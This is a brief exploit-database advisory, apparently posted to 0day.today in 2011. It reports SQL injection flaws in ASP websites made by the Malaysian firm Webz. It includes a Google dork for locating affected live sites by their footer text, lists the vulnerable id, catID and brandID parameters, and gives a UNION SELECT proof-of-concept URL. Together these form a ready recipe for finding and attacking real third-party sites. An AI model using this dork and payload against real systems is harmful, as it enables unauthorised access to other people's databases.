id: 15560
date: 03/09/2011
title: Web Design by Webz SQL Injection Vulnerability
author: p0pc0rn
cves: 

Title	: Web Design by Webz Vulnerable to SQL Injection
Web		: http://www.webz.com.my/
Found by: p0pc0rn 08/03/2011
Dork	: intext:"Web Design by Webz" filetype:asp


SQL - Microsoft JET Database Engine error
------------------------------------------

http://site.com/xxx.asp?id=[SQL]
http://site.com/xxx.asp?catID=[SQL]
http://site.com/xxx.asp?brandID=[SQL]

and other parameters are vulnerable to SQL Injection

POC
---

http://site.com/xxx.asp?id=1 union select 1 from test.a



#  0day.today [2023-03-21]  #